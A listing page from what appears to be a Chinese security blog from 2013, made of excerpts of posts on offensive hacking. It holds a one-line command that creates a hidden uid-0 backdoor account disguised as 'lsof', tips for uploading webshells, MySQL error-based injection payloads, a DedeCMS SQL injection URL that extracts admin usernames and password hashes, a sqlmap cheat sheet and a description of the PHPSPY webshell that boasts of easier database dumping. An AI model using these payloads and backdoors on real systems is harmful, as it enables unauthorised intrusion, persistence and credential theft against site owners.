上一页 1 ··· 18 19 20 21 22 23 24 25 26 ··· 43 下一页

2013年7月25日

linux一条命令添加一个root级别账户并设置密码

摘要: 内网机器提权添加账户,无回显,设置密码就不好弄,下面就是添加一个root级别的账户并设置密码的命令?1useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof命令解释useradd 添加用户-p `openssl passwd -1 -salt 'lsof' admin` 这个里面的指的是设置用户的密码,里面的lsof差不多是密钥之类的,可以随便写, admin是明文密码-u 0 -o 添加一个uid为 阅读全文

posted @ 2013-07-25 12:01 cn三少<script></script> 阅读(832) 评论(0) 推荐(0) 编辑

网站渗透的一些经验

摘要: 1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件;3.asp(aspx)+ACCESS拿shell一般只有3种方法,一是前台上传或者注入进后台上传;二是注入进后台改配置文件;三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句 阅读全文

posted @ 2013-07-25 09:17 cn三少<script></script> 阅读(391) 评论(0) 推荐(0) 编辑

2013年7月24日

sqlmap使用笔记

摘要: -u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “”#指定数据库名-T “”#指定表名-C “”#指定字段-s “”#保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” –resume)–columns #列出字段–current-user #获取当前用户名称–current-db #获取当前数据库名称–users #列数据库所有用户–passwords #数据库用户所有密码–privileges #查看用户权限(–privil 阅读全文

posted @ 2013-07-24 23:48 cn三少<script></script> 阅读(835) 评论(0) 推荐(0) 编辑

2013年7月12日

linux下查看cc攻击

摘要: 什么是CC攻击?CC攻击就是利用大量代理服务器对目标计算机发起大量连接,导致目标服务器资源枯竭造成拒绝服务。那么如何判断查询CC攻击呢?本文主要介绍了一些Linux下判断CC攻击的命令。查看所有80端口的连接数netstat -nat|grep -i "80"|wc -l对连接的IP按连接数量进行排序netstat -anp | grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nnetstat -ntu | awk '{print $5 阅读全文

posted @ 2013-07-12 15:40 cn三少<script></script> 阅读(323) 评论(0) 推荐(0) 编辑

2013年6月28日

Mysql暴错注入代码-webshell

摘要: MySql Error Based Injection Reference[Mysql暴错注入参考]Author:Pnig0s1992Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功小部分版本使用name_const()时会报错.可以用给出的Method.2测试查询版本:Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)Method.2:and+(SELECT+1+FROM+(select 阅读全文

posted @ 2013-06-28 17:03 cn三少<script></script> 阅读(1472) 评论(0) 推荐(0) 编辑

捅伊朗黑客PP — 后台登陆POST+错误回显 注入

摘要: 看了一个泰国政府的网站被伊朗的黑客挂页,上面写着“Your Box 0wn3z By Behrooz_Ice – Q7x -Sha2ow -Virangar -Ali_Eagle -iman_taktaz – Satanic2000”“We Love Iran”“Ashiyane Digital Security Team”这样的话云云。一些中国的傻逼还拿着别人的黑页去zone-h去提交,感觉受不了这么傻逼的事情,就跟着犯了傻逼,捅了人家的PP下面我就讲讲怎么捅了他们的PP(http://203.154.183.18/ash_hack.htm)作者:YoCo Smart来自:Silic Gro 阅读全文

posted @ 2013-06-28 13:02 cn三少<script></script> 阅读(908) 评论(0) 推荐(0) 编辑

2013年6月7日

iotop 查看进程所占用的io

摘要: 如果你知道有程序在磨你的硬盘,但是你又不能确定是哪一个程序在磨你的硬盘,那么就用 iotop来帮助你吧。在Ubuntu里安装命令是: sudo apt-get install iotop安装好之后在终端输入:iotop就可以了下面来说一具体运用:可以用左右箭头操作,按 r 是相反方向,按 o 是动态切换用法 iotop -参数–version 查看版本信息的-h, –help 查看帮助信息的-o, –only 只显示在划硬盘的程序-b, –batch 批量处理 用来记录日志的-n NUM 设定循环几次-d SEC, –delay=SEC 设定显示时间间隔 阅读全文

posted @ 2013-06-07 17:26 cn三少<script></script> 阅读(414) 评论(0) 推荐(0) 编辑

2013年5月23日

Google搜索技巧挑战隐私(Google hacker)

摘要: Google Hacking的含义原指利用Google Google搜索引擎搜索信息来进行入侵的技术和行为,现指利用各种搜索引擎搜索信息来进行入侵的技术和行为.Google Hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉Google Hacking其实并非如此简单。看论坛没人发google hacker之类的,我就发个吧。个人还是挺喜欢google,这个是不是完整版的我就不清楚了,然后这个也不是我翻 阅读全文

posted @ 2013-05-23 09:29 cn三少<script></script> 阅读(1313) 评论(0) 推荐(0) 编辑

2013年5月10日

PHPSPY2013

摘要: PHPSPY2013的功能主要还是以文件管理、数据库管理、执行命令、查看系统信息为主。目前改进如下。1.删除通过数据库上传、下载文件,因为这个功能需要连接数据库的用户拥有FILE权限,有一定的局限性,而且不常用。所以删除以达到缩小体积的目的。需要用的可以用PHPSPY2011。2.增强导出数据的兼容性。以方便拖库的同学。已经测试过两个不同语言不同编码的800万条数据的库。导出文件大小1G。 6分钟。无错导出并且能无错导入。并且能显示正确的编码文字。爽了。3.删除数据库的插入、编辑功能。这个功能当初是为了考虑数据库挂马方便。但是现在挂马的很少了。红客学院而且完全可以自己执行SQL语句来实现。所以 阅读全文

posted @ 2013-05-10 15:31 cn三少<script></script> 阅读(2031) 评论(0) 推荐(0) 编辑

2013年5月3日

搞dedecms站 找后台的一些经验

摘要: 首先:注入exp有时候 有些/plus/目录换成了/plugins目录/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a/plus/search.php?keyword=as&type 阅读全文

posted @ 2013-05-03 15:08 cn三少<script></script> 阅读(266) 评论(0) 推荐(0) 编辑

上一页 1 ··· 18 19 20 21 22 23 24 25 26 ··· 43 下一页

导航